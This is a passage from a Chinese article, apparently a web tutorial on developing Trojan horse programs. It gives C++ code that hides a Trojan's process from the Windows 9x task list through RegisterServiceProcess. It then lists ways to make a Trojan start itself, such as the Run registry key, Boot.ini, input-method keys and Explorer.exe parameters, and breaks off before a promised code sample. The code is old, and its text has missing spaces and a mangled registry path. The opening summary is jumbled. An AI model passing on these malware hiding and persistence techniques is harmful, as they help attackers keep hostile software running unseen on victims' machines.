透视木马程序开发技术（上）

核心提示： 出于安全考虑，我只给出一种通过注册服务程序，透视木马程序开发技术（上）(3)，实现进程伪隐藏的方法，对于更复杂，或者通过注册表里的输入法键值直接挂接启动，通过修改Explorer.exe启动参数等等的方法，高级的隐藏方法，比如远程线程插入其他进程的方法

出于安全考虑，我只给出一种通过注册服务程序，实现进程伪隐藏的方法，对于更复杂，高级的隐藏方法，比如远程线程插入其他进程的方法，请参阅ShotGun的文章《NT系统下木马进程的隐藏与检测》。

WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
　　　　try
　　　　{
　　　　DWORDdwVersion=GetVersion();　　//取得Windows的版本号
　　　　　　　　if(dwVersion>=0x80000000)　　　//Windows9x隐藏任务列表
　　　　　　　　{
　　　　　　　　　int(CALLBACK*rsp)(DWORD,DWORD);
　　　　　　　　　HINSTANCEdll=LoadLibrary("KERNEL32.DLL");　　//装入KERNEL32.D
LL
　　　　　　　　　　rsp=(int(CALLBACK*)(DWORD,DWORD))GetProcAddress(dll,"Regist
erServiceProcess");　　//找到RegisterServiceProcess的入口
　　　　　　　　　　rsp(NULL,1);　　//注册服务
　　　　　　　　　　FreeLibrary(dll);　　//释放DLL模块
　　　　　　　　}
　　　　}
　　　　catch(Exception&exception)　　//处理异常事件
　　　　{
//处理异常事件
　　　　}
　　　　return0;
}

3、程序的自加载运行技术

让程序自运行的方法比较多，除了最常见的方法：加载程序到启动组，写程序启动路径到注册表的HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionsRun的方法外，还有很多其他的办法，据yagami讲，还有几十种方法之多，比如可以修改Boot.ini，或者通过注册表里的输入法键值直接挂接启动，通过修改Explorer.exe启动参数等等的方法，真的可以说是防不胜防，下面展示一段通过修改HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionsRun键值来实现自启动的程序：